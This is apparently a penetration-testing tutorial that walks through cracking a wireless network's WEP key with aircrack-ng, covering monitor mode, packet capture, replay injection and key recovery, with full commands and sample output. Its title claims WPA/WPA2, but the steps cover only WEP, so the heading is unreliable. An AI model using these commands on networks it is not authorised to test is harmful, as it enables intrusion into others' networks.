OtherPenetration TestingWireless Pentest

Hacking WiFi – WPA/WPA 2 Using Aircrack-ng Tool

To crack the WEP key a hacker needs to capture sample packets not intended for his own network interface and run crack program to compare testing keys against WEP key bundled with captured packets in attempt of decryption. The key which fits to decrypt captured packets is the key used by wireless network to encrypt its entire wireless communication with its connected stations.


The guide assumes that your have wireless network card installed and that it supports monitor mode. In this example I’m using Realtek Semiconductor Co., Ltd. RTL-8185 IEEE 802.11a/b/g Wireless LAN Controller.

1. AIR Crack installation


# apt-get install aircrack-ng


# yum -y install aircrack-ng



2. Identify wireless network interface

First we need to identify name of our wireless network interface. If your wireless network card is installed correctly an iwconfig command will reveal the name of your wireless network interface:

$ /sbin/iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm

3. Turn on Monitor mode

# airmon-ng start wlan0
Interface       Chipset         Driver
wlan0                   rtl8180 - [phy0]
      (monitor mode enabled on mon0)

4. Identify a wireless network BSSID

In this guide i’m are going to crack a wireless WEP key of my own network. In this step I need to identify BSSID of the network I’m intending to crack and as well as its channel number:

# airodump-ng wlan0

Identify a wireless network BSSID

Information we can retrieve from airodump-ng output:
BSSID : 00:11:95:9F:FD:F4
Channel: 6
MAC: 00:13:02:30:FF:EC
Station connected to my wireless router is my laptop with wireless network card running Debian lenny. It is important to have at least one station associated with base so we can capture packets from this communication.

5. Sniffing wireless network

At this stage we can start capturing packets between base and station. The following command will start capturing packets. It is recommended to capture at least 5000 packets. Number of packets required depends on WEP key length in use. I have managed to crack WEP key 64 bits long with 10 hex characters with around 6000 captured packets. Number 6 in the following command is a channel number of our wireless base station.

# airodump-ng -c 6 -w data-capture wlan0

6. Injection of packets

Capturing the packets may take some. aireplay-ng will create some traffic so we can capture more packets for a given time. Since we are hacking our own network, browsing internet on my laptop also helps to create some traffic.

# aireplay-ng -3 -b 00:11:95:9F:FD:F4 -h 00:13:02:30:FF:EC wlan0

7. Crack WEP wireless key

As a last step we crack WEP key by using captured packets and aircrack-ng command. All captured packets are now stored in data-capture-01.cap file.
NOTE: do not stop capturing process as you do not know if current amount of captured packed is satisfactory to crack WEP key.

 # aircrack-ng -z data-capture-01.cap
Opening data-capture-01.cap
Read 450 packets.

   #  BSSID              ESSID                     Encryption

   1  00:11:95:9F:FD:F4  linuxconfig.org           WEP (210 IVs)
   2  00:17:3F:65:2E:5A  belkin54g                 None (

Index number of target network ?

                               Aircrack-ng 1.0 rc1

               [00:00:13] Tested 485 keys (got 16690 IVs)

   KB    depth   byte(vote)
    0    9/ 13   00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)
    1    0/  1   F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)
    2    0/  2   8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)
    3    0/  5   6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)
    4    3/  4   98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)

                         KEY FOUND! [ 3F:F3:8E:6E:98 ]
        Decrypted correctly: 100%





Related Articles

Back to top button